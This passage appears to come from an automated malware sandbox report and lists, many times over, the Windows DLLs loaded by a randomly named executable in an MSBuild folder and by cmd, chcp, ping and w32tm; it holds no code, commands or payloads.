                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dll
